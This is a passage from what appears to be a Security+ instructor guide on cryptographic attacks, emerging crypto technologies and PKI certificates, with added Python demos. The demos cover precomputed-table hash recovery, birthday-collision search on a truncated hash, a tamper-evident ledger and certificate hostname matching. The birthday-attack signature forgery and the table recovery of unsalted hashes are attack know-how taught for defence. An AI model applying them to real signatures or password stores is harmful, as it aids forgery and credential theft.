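    """Instant recovery for an unsalted hash; always None for the salted format,
    because the table would have to be rebuilt per salt and per iteration count."""
    return table.get(stored_hash)


if __name__ == "__main__":
    table = precomputed_table(COMMON_WORDS)
    print("unsalted hash recovered from table:", table_lookup(unsalted_sha256("dragon"), table))
    stored = hash_password("dragon")
    print("salted record found in table:", table_lookup(stored, table))
    print("verify correct:", verify_password("dragon", stored),
          "| verify wrong:", verify_password("dragons", stored))
```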

Collisions and the Birthday Attack

Show Slide(s): Collisions and the Birthday Attack

A birthday attack is a type of brute force attack aimed at exploiting collisions in hash functions. A collision is where a function produces the same hash value for two different plaintexts. This type of attack can be used for the purpose of forging a digital signature. The attack works as follows:
1. The attacker creates a malicious document and a benign document that produce the same hash value. The attacker submits the benign document for signing by the target.
2. The attacker then removes the signature from the benign document and adds it to the malicious document, forging the target's signature.
The trick here is being able to create a malicious document that outputs the same hash as the benign document. The birthday paradox means that the computational time required to do this is less than might be expected. The birthday paradox asks how large must a group of people be so that the chance of two of them sharing a birthday is 50%. The answer is 23, but people who are not aware of the paradox often answer with a far larger number. The point is that the chances of someone sharing a particular birthday are small, but the chances of any two people sharing any birthday get better and better as you add more people.
To exploit the paradox, the attacker creates multiple malicious and benign documents, both featuring minor changes (punctuation, extra spaces, and so on). Depending on the length of the hash and the limits to the non-suspicious changes that can be introduced, if the attacker can generate sufficient variations, then the chance of matching hash outputs can be better than 50%.
This means that to protect against the birthday attack, encryption algorithms must demonstrate collision avoidance (that is, to reduce the chance that different inputs will produce the same output). To exploit the birthday paradox, the attacker generally has to be able to manipulate both documents/messages, referred to as a chosen prefix attack (sha-mbles.github.io). The birthday paradox method has been used successfully to exploit collisions in the MD5 function to create fake digital certificates that appear to have been signed by a certificate authority in a trusted root chain (trailofbits.files.wordpress.com, "flame-md5.pdf").
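The birthday arithmetic behind this attack, as an added example that is not from the guide: exact and approximate collision probabilities, the trial count a collision search needs for a given hash width, and a search over a deliberately truncated SHA-256 in which a repeat appears after roughly 2^(bits/2) variations rather than 2^bits. The truncation width and the document-variant strings are constructed for the demo.

```python
"""Birthday-paradox arithmetic for hash collisions (added example, not from the guide).

Truncating SHA-256 to a few bits is done only so the search finishes instantly;
the point is the ratio between trials needed and the size of the output space.
The "benign document" variant strings are constructed placeholders.
"""
import hashlib
import math


def collision_probability(n: int, space: int) -> float:
    """Exact chance that n uniform draws from `space` values contain a repeat."""
    if n > space:
        return 1.0
    p_all_distinct = 1.0
    for i in range(n):
        p_all_distinct *= (space - i) / space
    return 1.0 - p_all_distinct


def draws_for_probability(target: float, space: int) -> int:
    """Smallest n with collision_probability(n, space) >= target (exact; small spaces)."""
    n = 1
    while collision_probability(n, space) < target:
        n += 1
    return n


def approx_trials_for_collision(bits: int, target: float = 0.5) -> float:
    """n ~ sqrt(2 * N * ln(1/(1-p))) for N = 2**bits; about 2**(bits/2) at p = 0.5.

    This is why a hash with b output bits offers only about b/2 bits of
    collision resistance, and why short or truncated hashes are unsafe for
    signatures.
    """
    return math.sqrt(2 * (2 ** bits) * math.log(1 / (1 - target)))


def truncated_hash(data: bytes, bits: int) -> int:
    """SHA-256 reduced to its first `bits` bits, standing in for a short hash."""
    digest = int.from_bytes(hashlib.sha256(data).digest(), "big")
    return digest >> (256 - bits)


def find_collision(bits: int, prefix: bytes = b"benign document v"):
    """Generate variants until two share a truncated hash.

    Returns (trials, variant_a, variant_b). The variants differ only in a
    counter, mimicking the harmless edits (spacing, punctuation) in the text.
    """
    seen = {}
    counter = 0
    while True:
        variant = prefix + str(counter).encode()
        h = truncated_hash(variant, bits)
        if h in seen:
            return counter + 1, seen[h], variant
        seen[h] = variant
        counter += 1


if __name__ == "__main__":
    print("people for a 50% shared birthday:", draws_for_probability(0.5, 365))
    print("trials for a 50% collision in a 128-bit hash ~ 2^%.1f"
          % math.log2(approx_trials_for_collision(128)))
    trials, a, b = find_collision(20)
    print(f"20-bit hash: collision after {trials} variants (space is {2 ** 20}): {a!r} vs {b!r}")
```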


Review Activity:
Cryptographic Use Cases and Weaknesses
Answer the following questions:

1. True or false? Cryptography is about keeping things secret so they cannot be used as the basis of a non-repudiation system.

False. The usages are not exclusive. There are different types of cryptography and some can be used for non-repudiation. The principle is that if an encryption method (cipher and key) is known only to one person, that person cannot then deny having composed a message. This depends on the algorithm design allowing recipients to decrypt the message but not encrypt it.

2. How can cryptography support high resiliency?

A complex system might have to support many inputs from devices installed to potentially unsecure locations. Such a system is resilient if compromise of a small part of the system is prevented from allowing compromise of the whole system. Cryptography assists this goal by ensuring the authentication and integrity of messages delivered over the control system.

3. For which types of system will a cipher suite that exhibits high latency be problematic?

High latency is not desirable in any system really, but it will affect real-time protocols that exchange voice or video most. In network communications, latency makes the initial protocol handshake longer, meaning delay for users and possible application timeout issues.

4. What is the relevance of entropy to cryptographic functions?

Entropy is a measure of how disordered something is. A disordered ciphertext is desirable, because remaining features of order from the plaintext make the ciphertext vulnerable to analysis. Identical plaintexts need to be initialized with random or counter values when encrypted by the same key, and the cryptosystem needs a source of randomness to generate strong keys.

5. Your company creates software that requires a database of stored encrypted passwords. What security control could you use to make the password database more resistant to brute force attacks?

Using a key stretching password storage library, such as PBKDF2, improves resistance to brute force cracking methods. You might also mention that you could use policies to make users choose longer, non-trivial passwords.


Topic 5D
Summarize Other Cryptographic Technologies

EXAM OBJECTIVES COVERED
2.8 Summarize the basics of cryptographic concepts

Teaching Tip: This topic collects the remaining content examples from objective 2.8. While students need to know these for the exam, they are not critical to understanding authentication and authorization technologies. If students are feeling overloaded, you may want to skip this topic or leave it to later in the course.

The landscape for developing and using cryptographic processes is continually evolving. As a security professional, it is important that you keep up to date with these trends so that you can recognize new opportunities for implementing better security controls and threats to existing controls caused by technological progress.

Quantum and Post-Quantum

Show Slide(s): Quantum and Post-Quantum

Quantum refers to computers that use properties of quantum mechanics to significantly out-perform classical computers at certain tasks.

Computing
A quantum computer performs processing on units called qubits (quantum bits). A qubit can be set to 0 or 1 or an indeterminate state called a superposition, where there is a probability of it being either 0 or 1. The likelihood can be balanced or can be weighted either way. The power of quantum computing comes from the fact that qubits can be entangled. When the value of a qubit is read, it collapses to either 0 or 1, and all other entangled qubits collapse at the same time. The strength of this architecture is that a single operation can utilize huge numbers of state variables represented as qubits, while a classical computer's CPU must go through a read, execute, write cycle for each bit of memory. This makes quantum very well suited to solving certain tasks, two of which are the factoring problem that underpins RSA encryption and the discrete logarithm problem that underpins ECC.

Communications
While quantum computing could put the strength of current cryptographic ciphers at risk, it also has the promise of underpinning more secure cryptosystems. The properties of entanglement, superposition, and collapse suit the design of a tamper-evident communication system that would allow secure key agreement.

Post-Quantum
Post-quantum refers to the expected state of computing when quantum computers that can perform useful tasks are a reality. Currently, the physical properties of qubits and entanglement make quantum computers very hard to scale up. At the time of writing, the most powerful quantum computers have relatively few qubits. A quantum computer will need about a million qubits to run useful applications. No one can predict with certainty if or when such a computer will be implemented. In the meantime, NIST is running a project to develop cryptographic ciphers that are resistant to cracking even by quantum computers (csrc.nist.gov/projects/post-quantum-cryptography).
More generally, cryptographic agility refers to an organization's ability to update the specific algorithms used across a range of security products without affecting the business workflows that those products support (cryptosense.com/blog/achieving-crypto-agility).

Lightweight Cryptography
Another problem affecting current cryptographic ciphers is use on low-power devices. NIST is hoping that a compact cipher suite will be developed that is both quantum resistant and that can run on battery-powered devices with minimal CPU and memory resources (csrc.nist.gov/projects/lightweight-cryptography).

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5D

Homomorphic Encryption

Show Slide(s): Homomorphic Encryption

Teaching Tip: We're keeping this here as part of objective 2.8, but note that it relates more to data privacy, which we'll get to later in the course.

Homomorphic encryption is principally used to share privacy-sensitive data sets. When a company collects private data, it is responsible for keeping the data secure and respecting the privacy rights of individual data subjects. Companies often want to use third parties to perform analysis, however. Sharing unencrypted data in this scenario is a significant risk. Homomorphic encryption is a solution for this use case because it allows the receiving company to perform statistical calculations on fields within the data while keeping the data set as a whole encrypted. For example, if you want to perform analytics on customer interactions, an analysis tool will be able to sum logons without any account identifiers like email addresses ever being decrypted.

Blockchain

Show Slide(s): Blockchain

Blockchain is a concept in which an expanding list of transactional records is secured using cryptography. Each record is referred to as a block and is run through a hash function. The hash value of the previous block in the chain is added to the hash calculation of the next block in the chain. This ensures that each successive block is cryptographically linked. Each block validates the hash of the previous block, all the way through to the beginning of the chain, ensuring that each historical transaction has not been tampered with. In addition, each block typically includes a timestamp of one or more transactions, as well as the data involved in the transactions themselves.
The blockchain is recorded in a public ledger. This ledger does not exist as an individual file on a single computer; rather, one of the most important characteristics of a blockchain is that it is decentralized. The ledger is distributed across a peer-to-peer (P2P) network in order to mitigate the risks associated with having a single point of failure or compromise. Blockchain users can therefore trust each other equally. Likewise, another defining quality of a blockchain is its openness: everyone has the same ability to view every transaction on a blockchain.
Blockchain technology has a variety of potential applications. It can ensure the integrity and transparency of financial transactions, online voting systems, identity management systems, notarization, data storage, and more. However, blockchain is still an emerging technology, and outside of cryptocurrencies, has not yet been adopted on a wide-ranging scale.

Steganography

Show Slide(s): Steganography

Teaching Tip: There are various software applications for inserting and detecting steganographic messages. When hiding messages in files, a substitution technique such as least significant bit is preferable to simply inserting a message as it does not alter the file size.

Steganography (literally meaning "hidden writing") is a technique for obscuring the presence of a message. Typically, information is embedded where you would not expect to find it (a message hidden in a picture, for instance). The container document or file is called the covertext. A steganography tool is software that either facilitates this


or conversely that can be used to detect the presence of a hidden message within a covertext.
When used to conceal information, steganography amounts to security by obscurity, which is usually deprecated. However, a message can be encrypted by some mechanism before embedding it, providing confidentiality. The technology can also provide integrity or non-repudiation; for example, it could show that something was printed on a particular device at a particular time, which could demonstrate that it was genuine or a fake, depending on context.
One example of steganography is to encode messages within TCP packet data fields to create a covert message channel. Another approach is to change the least significant bit of pixels in an image file. This can code a useful amount of information without distorting the original image noticeably. Similar techniques can be used with other media types as cover files, such as audio and video files.
These methods might be used for command and control or to exfiltrate data covertly, bypassing protection mechanisms such as data loss prevention (DLP) (blog.trendmicro.com/trendlabs-security-intelligence/steganography-and-malware-concealing-code-and-cc-traffic). Future developments may see use of steganography in streaming media or voice-over-IP (VoIP).
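A minimal hash-chained ledger, as an added example (not from the guide) of the linking described in the blockchain passage above: each block's hash covers the previous block's hash, so validate_chain() pinpoints the first block whose link breaks after any tampered record. The block fields, the sample transactions and the JSON canonicalization are constructed for this illustration; distribution across peers and consensus are not modelled.

```python
"""Hash-chained ledger with tamper detection (added example, not from the guide).

Block layout, JSON canonicalization and SAMPLE_BATCHES are constructed for this
illustration; P2P distribution and consensus are out of scope here.
"""
import copy
import hashlib
import json

GENESIS_PREV = "0" * 64  # the first block has no predecessor to link to


def block_hash(block: dict) -> str:
    """SHA-256 over every field except the block's own stored hash, in canonical order."""
    body = {k: v for k, v in block.items() if k != "hash"}
    return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()


def make_block(index: int, prev_hash: str, timestamp: int, transactions: list) -> dict:
    block = {"index": index, "prev_hash": prev_hash,
             "timestamp": timestamp, "transactions": transactions}
    block["hash"] = block_hash(block)  # covers prev_hash, so blocks are linked
    return block


def build_chain(tx_batches: list, start_time: int = 1_600_000_000) -> list:
    chain, prev = [], GENESIS_PREV
    for i, txs in enumerate(tx_batches):
        block = make_block(i, prev, start_time + i, txs)
        chain.append(block)
        prev = block["hash"]
    return chain


def validate_chain(chain: list):
    """Walk forward from genesis; return (True, None) or (False, first_bad_index).

    A block fails if its stored hash no longer matches its contents or if its
    prev_hash does not equal the hash of the block before it.
    """
    for i, block in enumerate(chain):
        expected_prev = GENESIS_PREV if i == 0 else chain[i - 1]["hash"]
        if (block["index"] != i
                or block["prev_hash"] != expected_prev
                or block_hash(block) != block["hash"]):
            return False, i
    return True, None


# Constructed sample ledger: three blocks of toy transfers.
SAMPLE_BATCHES = [
    [{"from": "alice", "to": "bob", "amount": 5}],
    [{"from": "bob", "to": "carol", "amount": 2}],
    [{"from": "carol", "to": "alice", "amount": 1}],
]


def tamper(chain: list, index: int, new_amount: int, rehash: bool = False) -> list:
    """Return a copy with one historical amount changed; optionally recompute that block's hash."""
    forged = copy.deepcopy(chain)
    forged[index]["transactions"][0]["amount"] = new_amount
    if rehash:
        forged[index]["hash"] = block_hash(forged[index])
    return forged


if __name__ == "__main__":
    ledger = build_chain(SAMPLE_BATCHES)
    print("clean ledger:", validate_chain(ledger))
    print("edited amount only:", validate_chain(tamper(ledger, 1, 200)))
    # Recomputing the edited block's hash only moves the break to the next link;
    # every later block would have to be rewritten as well.
    print("edited and rehashed:", validate_chain(tamper(ledger, 1, 200, rehash=True)))
```

The final block has no successor protecting it, which is why a real blockchain relies on the distributed copies and consensus described above rather than on the hash chain alone.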


Review Activity:
Other Cryptographic Technologies
Answer the following questions:

1. Which cryptographic technology is most useful for sharing medical records with an analytics company?

Homomorphic encryption allows calculations to be performed while preserving privacy and confidentiality by keeping the data encrypted.

2. You are assisting a customer with implementing data loss prevention (DLP) software. Of the two products left in consideration, one supports steganalysis of image data, but the other does not. What is the risk of omitting this capability?

A threat actor could conceal information within an image file and use that to bypass the DLP system. One thing to note is that attackers could find other ways to implement covertexts (audio or video, for instance) or abuse protocol coding. There are many things that steganalysis needs to be able to scan for! You might also note that steganography is not only a data exfiltration risk. It can also be used to smuggle malicious code into a host system.


Lesson 5
Summary

Teaching Tip: Check that students are confident about the content that has been covered. If there is time, revisit any content examples that they have questions about. If you have used all the available time for this lesson block, note the issues, and schedule time for a review later in the course.

You should be able to summarize types of cryptographic function (hash algorithm, symmetric cipher, asymmetric cipher) and explain how they are used in hybrid encryption products to provide confidentiality, integrity, authentication, and resiliency. You should also be able to identify limitations and weaknesses, plus common types of cryptographic attacks. Finally, you should be able to summarize other concepts, such as quantum, blockchain, homomorphic encryption, and steganography.

Lesson 6
Implementing Public Key Infrastructure

LESSON INTRODUCTION

Teaching Tip: This lesson focuses on the practical side of implementing cryptographic infrastructure. You will be returning to the actual systems that use cryptography (authentication, SSL/TLS, VPN, WPA, and so on) throughout the rest of the course.

Digital certificates and public key infrastructure (PKI) are critical services used to manage identification, authentication, and data confidentiality across most private and public networks. It is important that you understand the types of certificate that can be issued and are able to apply effective management principles when configuring and supporting these systems.

Lesson Objectives

In this lesson, you will:

• Implement certificates and certificate authorities.

• Implement PKI management.


Topic 6A
Implement Certificates and Certificate Authorities

EXAM OBJECTIVES COVERED
3.9 Given a scenario, implement public key infrastructure

Teaching Tip: As the previous lesson covered a lot of theory, you may prefer to focus more on labs for this topic. Most of the content examples are straightforward.

A digital certificate is a public assertion of identity, validated by a certificate authority (CA). As well as asserting identity, certificates can be issued for different purposes, such as protecting web server communications or signing messages. Issuing certificates is likely to be an important part of your day-to-day role as a security administrator.

Public and Private Key Usage

Show Slide(s): Public and Private Key Usage

Teaching Tip: This is a quick recap of the previous lesson. Be sure that students grasp the use of public and private keys before attempting to move on.

Public key cryptography solves the problem of distributing encryption keys when you want to communicate securely with others or authenticate a message that you send to others.
• When you want others to send you confidential messages, you give them your public key to use to encrypt the message. The message can then only be decrypted by your private key, which you keep known only to yourself.
• When you want to authenticate yourself to others, you create a signature and sign it by encrypting the signature with your private key. You give others your public key to use to decrypt the signature. As only you know the private key, everyone can be assured that only you could have created the signature.
The basic problem with public key cryptography is that you may not really know with whom you are communicating. The system is vulnerable to man-in-the-middle attacks. This problem is particularly evident with e-commerce. How can you be sure that a shopping site or banking service is really maintained by whom it claims? The fact that the site is distributing public keys to secure communications is no guarantee of actual identity. How do you know that you are corresponding directly with the site using its certificate? How can you be sure there isn't a man-in-the-middle intercepting and modifying what you think the legitimate server is sending you?
Public key infrastructure (PKI) aims to prove that the owners of public keys are who they say they are. Under PKI, anyone issuing public keys should obtain a digital certificate. The validity of the certificate is guaranteed by a certificate authority (CA). The validity of the CA can be established using various models.

Certificate Authorities

Show Slide(s): Certificate Authorities

The certificate authority (CA) is the entity responsible for issuing and guaranteeing certificates. Private CAs can be set up within an organization for internal communications. Most network operating systems, including Windows Server, have certificate services. For public or business-to-business communications, however, the CA must be trusted by each party. Third-party CA services include IdenTrust, Digicert, Sectigo/Comodo, GoDaddy, and GlobalSign. The functions of a CA are as follows:
• Provide a range of certificate services useful to the community of users serviced by the CA.
• Ensure the validity of certificates and the identity of those applying for them (registration).
• Establish trust in the CA by users and government and regulatory authorities and enterprises, such as financial institutions.
• Manage the servers (repositories) that store and administer the certificates.
• Perform key and certificate lifecycle management, notably revoking invalid certificates.

Lesson 6: Implementing Public Key Infrastructure | Topic 6A

Microsoft Windows Server CA. (Screenshot used with permission from Microsoft.)

Show Slide(s): PKI Trust Models

PKI Trust Models
The trust model is a critical PKI concept, and shows how users and different CAs are
able to trust one another.

Teaching Tip: Emphasize that there is not one single hierarchy for all PKIs, and
likewise, there are many root CAs, one for each discrete hierarchy. An organization can
have its own root CA for its private PKI, for example.

Single CA
In this simple model, a single CA issues certificates to users; users trust certificates
issued by that CA and no other. The problem with this approach is that the single CA
server is very exposed. If it is compromised, the whole PKI collapses.

Hierarchical (Intermediate CA)
In the hierarchical model, a single CA (called the root) issues certificates to several
intermediate CAs. The intermediate CAs issue certificates to subjects (leaf or end
entities). This model has the advantage that different intermediate CAs can be set up
with different certificate policies, enabling users to perceive clearly what a particular
certificate is designed for. Each leaf certificate can be traced back to the root CA along
the certification path. This is also referred to as certificate chaining, or a chain of trust.
The root's certificate is self-signed. In the hierarchical model, the root is still a single
point of failure. If the root is damaged or compromised, the whole structure collapses.
To mitigate against this, however, the root server can be taken offline, as most of the
regular CA activities are handled by the intermediate CA servers.

Interaction Opportunity: Show a certificate hierarchy for a website (such as comptia.org).


A certification path. The leaf certificate (www.globalsign.com) was issued by an intermediate
Extended Validation CA, and that CA's certificate was issued by the root CA.
(Screenshot used with permission from Microsoft.)

Another problem is that there is limited opportunity for cross-certification; that is, to
trust the CA of another organization. Two organizations could agree to share a root
CA, but this would lead to operational difficulties that could only increase as more
organizations join. In practice, most clients are configured to trust multiple root CAs.

Online versus Offline CAs
An online CA is one that is available to accept and process certificate signing requests,
publish certificate revocation lists, and perform other certificate management tasks.
Because of the high risk posed by compromising the root CA, a secure configuration
involves making the root an offline CA. This means that it is disconnected from any
network and usually kept in a powered-down state. The root CA will need to be brought
online to add or update intermediate CAs.

Show Slide(s): Registration Authorities and CSRs

Registration Authorities and CSRs
Registration is the process by which end users create an account with the CA and
become authorized to request certificates. The exact processes by which users are
authorized and their identity proven are determined by the CA implementation. For
example, in a Windows Active Directory network, users and devices can often auto-
enroll with the CA just by authenticating to Active Directory. Commercial CAs might
perform a range of tests to ensure that a subject is who he or she claims to be. It is
in the CA's interest to ensure that it only issues certificates to legitimate users, or its
reputation will suffer.

Teaching Tip: Note that the CA does not generate the key pair and that the private key
is not part of the CSR. The private key must be kept securely on the host (or secure
removable storage, such as a smart card).

On a private network (such as a Windows domain), the right to issue certificates of different
types must be carefully controlled. The Windows CA supports access permissions for each
certificate type so that you can choose which accounts are able to issue them.


When a subject wants to obtain a certificate, it completes a certificate signing
request (CSR) and submits it to the CA. The CSR is a Base64 ASCII file containing the
information that the subject wants to use in the certificate, including its public key.
The CA reviews the request and checks that the information is valid. For a web
server, this may simply mean verifying that the subject name and fully qualified
domain name (FQDN) are identical, and verifying that the CSR was initiated by the
person administratively responsible for the domain, as identified in the domain's
WHOIS records. If the request is accepted, the CA signs the certificate and sends it to
the subject.
The registration function may be delegated by the CA to one or more registration
authorities (RAs). These entities complete identity checking and submit CSRs on
behalf of end users, but they do not actually sign or issue certificates.

Show Slide(s): Digital Certificates

Digital Certificates
A digital certificate is essentially a wrapper for a subject's public key. As well as the
public key, it contains information about the subject and the certificate's issuer or
guarantor. The certificate is digitally signed to prove that it was issued to the subject by
a particular CA. The subject could be a human user (for certificates allowing the signing
of messages, for instance) or a computer server (for a web server hosting confidential
transactions, for instance).

Teaching Tip: The X.509, PKIX, and PKCS standards aren't listed in the syllabus, so
students should not need to learn them. We include them here just for reference.

Digital certificate details. (Screenshot used with permission from Microsoft.)

Digital certificates are based on the X.509 standard approved by the International
Telecommunications Union and standardized by the Internet Engineering Task Force
(tools.ietf.org/html/rfc5280). The Public Key Infrastructure X.509 (PKIX) working group
manages the development of these standards. RSA also created a set of standards,
referred to as Public Key Cryptography Standards (PKCS), to promote the use of
public key infrastructure.


Show Slide(s): Certificate Attributes

Certificate Attributes
The X.509 standard defines the fields or attributes that must be present in the
certificate. Some of the main fields are listed in the following table.

Field                           Usage
Serial number                   A number uniquely identifying the certificate within the domain of its CA.
Signature algorithm             The algorithm used by the CA to sign the certificate.
Issuer                          The name of the CA.
Valid from/to                   Date and time during which the certificate is valid.
Subject                         The name of the certificate holder, expressed as a distinguished name (DN). Within this, the common name (CN) part should usually match either the fully qualified domain name (FQDN) of the server or a user email address.
Public key                      Public key and algorithm used by the certificate holder.
Extensions                      V3 certificates can be defined with extended attributes, such as friendly subject or issuer names, contact email addresses, and intended key usage.
Subject alternative name (SAN)  This extension field is the preferred mechanism to identify the DNS name or names by which a host is identified.

Teaching Tip: Object identifiers (OIDs) have been removed as a content example, but
remain in the acronym list. The term is included in the glossary, but you might want to
mention here that these attributes all have numeric identifiers.

Interaction Opportunity: Show the attributes of a web server certificate in a browser.
Firefox's certificate page is more readable than the standard Windows dialog.

Show Slide(s): Subject Name Attributes

Subject Name Attributes
When certificates were first introduced, the common name (CN) attribute was used
to identify the FQDN by which the server is accessed, such as www.comptia.org.
This usage grew by custom rather than design, however. The CN attribute can contain
different kinds of information, making it difficult for a browser to interpret it correctly.
Consequently, the CN attribute is deprecated as a method of validating subject identity
(tools.ietf.org/html/rfc6125, section 6.4.4).
The subject alternative name (SAN) extension field is structured to represent
different types of identifiers, including domain names. If a certificate is configured with
a SAN, the browser should validate that, and ignore the CN value. It is still safer to put
the FQDN in the CN as well, because not all browsers and implementations stay up to
date with the standards.
The SAN field also allows a certificate to represent different subdomains, such as
www.comptia.org and members.comptia.org.

Teaching Tip: The SAN field MUST be configured with the FQDN. Despite being
deprecated for this usage, it is safer to duplicate this information in the CN
(knowledge.digicert.com/solution/…) to ensure compatibility.


Microsoft's website certificate configured with alternative subject names for different subdomains.
(Screenshot used with permission from Microsoft.)

Listing the specific subdomains is more secure, but if a new subdomain is added, a new
certificate must be issued. A wildcard domain, such as *.comptia.org, means that
the certificate issued to the parent domain will be accepted as valid for all subdomains
(to a single level).

CompTIA's website certificate configured with a wildcard domain, allowing access via either
https://comptia.org or https://www.comptia.org. (Screenshot used with permission from Microsoft.)
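The matching rules above (SAN preferred, CN only as a legacy fallback, a wildcard covering exactly one label), as an added example that is not part of the original guide. It works on identifiers that have already been extracted from a certificate, so the function names and parameters below are this example's own assumptions; it does no certificate parsing.

```python
"""Host name matching against a certificate's SAN dNSNames and CN.

Added example, not from the CompTIA guide. Rules implemented:
  * if a subjectAltName extension is present, only its dNSName entries are
    consulted and the CN is ignored, even if the CN would have matched;
  * the CN is used only as a legacy fallback when there is no SAN at all;
  * a wildcard (*.comptia.org) matches exactly one label, so it covers
    www.comptia.org but neither comptia.org nor a.b.comptia.org;
  * matching is case-insensitive and ignores a trailing dot.
"""
from typing import List, Optional


def _labels(name: str) -> List[str]:
    """Split a DNS name into lower-case labels."""
    return name.lower().rstrip(".").split(".")


def match_dns_name(identifier: str, host: str) -> bool:
    """Match one certificate identifier (literal or wildcard) against host."""
    id_labels, host_labels = _labels(identifier), _labels(host)
    if len(id_labels) != len(host_labels):
        return False  # a wildcard never spans more than one level
    if id_labels[0] == "*":
        # Require at least two fixed labels after the wildcard, so that
        # "*.org" or a bare "*" is never accepted as an identifier.
        if len(id_labels) < 3:
            return False
        return id_labels[1:] == host_labels[1:]
    if "*" in identifier:
        return False  # partial wildcards (w*.comptia.org) are not supported
    return id_labels == host_labels


def host_matches_certificate(host: str,
                             san_dns_names: Optional[List[str]],
                             common_name: Optional[str]) -> bool:
    """Return True if the certificate identifies host.

    san_dns_names: dNSName values from the SAN extension, or None when the
                   certificate has no SAN extension at all.
    common_name:   the CN attribute of the Subject DN, or None.
    """
    if san_dns_names is not None:
        # SAN present: the CN MUST be ignored (RFC 6125 section 6.4.4).
        return any(match_dns_name(name, host) for name in san_dns_names)
    # Legacy certificate without a SAN: fall back to the CN.
    return common_name is not None and match_dns_name(common_name, host)


if __name__ == "__main__":
    # Constructed sample certificates (identifiers only, no real certs).
    san_cert = (["www.comptia.org", "members.comptia.org"], "www.comptia.org")
    wildcard_cert = (["*.comptia.org", "comptia.org"], "comptia.org")
    legacy_cert = (None, "www.example.test")
    for host, cert in [("members.comptia.org", san_cert),
                       ("shop.comptia.org", san_cert),
                       ("shop.comptia.org", wildcard_cert),
                       ("comptia.org", wildcard_cert),
                       ("a.b.comptia.org", wildcard_cert),
                       ("WWW.EXAMPLE.TEST", legacy_cert)]:
        print(host, "->", host_matches_certificate(host, *cert))
```

Two practitioner points fall out of the sample data: a certificate whose SAN lists www and members does not cover shop.comptia.org even if an administrator also put that name in the CN, and a *.comptia.org entry on its own does not match the parent name comptia.org, so a certificate that must serve both needs the parent listed as a separate SAN entry (which is what the sample wildcard_cert models).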


Show Slide(s): Types of Certificate

Types of Certificate
Certificate policies define the different uses of certificate types issued by the CA.
These can be configured as standard certificate templates.
A certificate type is set by configuring the Key Usage attribute. The Extended
Key Usage (EKU) field, referred to by Microsoft as Enhanced Key Usage, is a
complementary means of defining usage. Typical values used include Server
Authentication, Client Authentication, Code Signing, or Email Protection. The EKU field
is more flexible than the Key Usage field, but problems can occur when non-standard
or vendor-specific definitions are used.
An extension can be tagged as critical, meaning that the application processing the
certificate must be able to interpret the extension correctly; otherwise, the certificate
should be rejected. In the case of a Key Usage extension marked as critical, an
application should reject the certificate if it cannot resolve the Key Usage value. For
example, this prevents a certificate issued for encrypting traffic sent to a web server
from being used for signing an email message.

Certificate templates for Windows Server CA. (Screenshot used with permission from Microsoft.)

Show Slide(s): Web Server Certificate Types

Web Server Certificate Types

Teaching Tip: Make sure students can distinguish DV and EV and understand the use of
SAN or wildcard certificates.

A server certificate guarantees the identity of e-commerce sites or any sort of website
to which users submit data that should be kept confidential. One of the problems with
public key cryptography and trust models is that anyone can set up a PKI solution. It is
also simple to register convincing-sounding domain names, such as my-bank-server.foo,
where the real domain is mybank.foo. If users choose to trust a certificate in the naive
belief that simply having a certificate makes a site trustworthy, they could expose
themselves to fraud. There have also been cases of disreputable sites obtaining
certificates from third-party CAs that are automatically trusted by browsers, apparently
validating their identities as financial institutions.
Differently graded certificates might be used to provide levels of security; for example,
an online bank requires higher security than a site that collects marketing data.
• Domain Validation (DV): proving the ownership of a particular domain. This may be
proved by responding to an email to the authorized domain contact or by publishing
a text record to the domain. This process can be highly vulnerable to compromise.


Domain validation certificate. Only the padlock is shown and the browser reports that the owner is not
verified. (Screenshot used with permission from Microsoft.)

• Extended Validation (EV): subjecting to a process that requires more rigorous
checks on the subject's legal identity and control over the domain or software being
signed. EV standards are maintained by the CA/Browser Forum (cabforum.org). An EV
certificate cannot be issued for a wildcard domain.

Extended validation certificate from GlobalSign with the verified owner shown in green next to the
padlock. (Screenshot used with permission from GlobalSign, Inc.)


Show Slide(s): Other Certificate Types

Other Certificate Types
Web servers are not the only systems that need to validate identity. There are many
other certificate types, designed for different purposes.

Teaching Tip: Students should learn the uses and SAN/CN setting for these certificate types.

Machine/Computer Certificates
It might be necessary to issue certificates to machines (servers, PCs, smartphones, and
tablets), regardless of function. For example, in an Active Directory domain, machine
certificates could be issued to Domain Controllers, member servers, or even client
workstations. Machines without valid domain-issued certificates could be prevented
from accessing network resources. Machine certificates might be issued to network
appliances, such as routers, switches, and firewalls. The SAN (and often the CN) attribute
should be set to the FQDN of the machine (host name and local domain part).

Email/User Certificates
An email certificate can be used to sign and encrypt email messages, typically using
Secure/Multipurpose Internet Mail Extensions (S/MIME) or Pretty Good Privacy (PGP).
The user's email address must be entered as the SAN and CN. On a directory-based
local network, such as Windows Active Directory, there may be a need for a wider
range of user certificate types. For example, in AD there are user certificate templates
for standard users, administrators, smart card logon users, recovery agent users,
and Exchange mail users (with separate templates for signature and encryption). Each
certificate template has different key usage definitions.

Requesting a certificate. The CA has made several user-type certificate templates available with
different key usage specifications (encrypting files, signing emails, encrypting emails, and so on).
(Screenshot used with permission from Microsoft.)


Code Signing Certificates
A code signing certificate is issued to a software publisher, following some sort
of identity check and validation process by the CA. The publisher then signs the
executables or DLLs that make up the program to guarantee the validity of a software
application or browser plug-in. Some types of scripting environments, such as
PowerShell, can also require valid digital signatures. The CN is set to an organization
name, such as "CompTIA Development Services, LLC," rather than a FQDN.

Root Certificate
The root certificate is the one that identifies the CA itself. The root certificate is
self-signed. A root certificate would normally use a key size of at least 2048 bits.
Many providers are switching to 4096 bits. The CN for a root certificate is set to the
organization/CA name, such as "CompTIA Root CA," rather than an FQDN.

Self-signed Certificates
Any machine, web server, or program code can be deployed with a self-signed
certificate. Self-signed certificates will be marked as untrusted by the operating
system or browser, but an administrative user can choose to override this.


Review Activity:
Certificates and Certificate Authorities
Answer the following questions:

1. What is the main weakness of a hierarchical trust model?

The structure depends on the integrity of the root CA.

2. How does a subject go about obtaining a certificate from a CA?

In most cases, the subject generates a key pair then adds the public key along with
subject information and certificate type in a certificate signing request (CSR) and
submits it to the CA. If the CA accepts the request, it generates a certificate with the
appropriate key usage and validity, signs it, and transmits it to the subject.

3. What cryptographic information is stored in a digital certificate?

The subject's public key and the algorithms used for encryption and hashing. The
certificate also stores a digital signature from the issuing CA, establishing the chain of
trust.

4. What does it mean if a certificate extension attribute is marked as critical?

That the application processing the certificate must be able to interpret the extension
correctly. Otherwise, it should reject the certificate.

5. You are developing a secure web application. What sort of certificate should
you request to show that you are the publisher of a program?

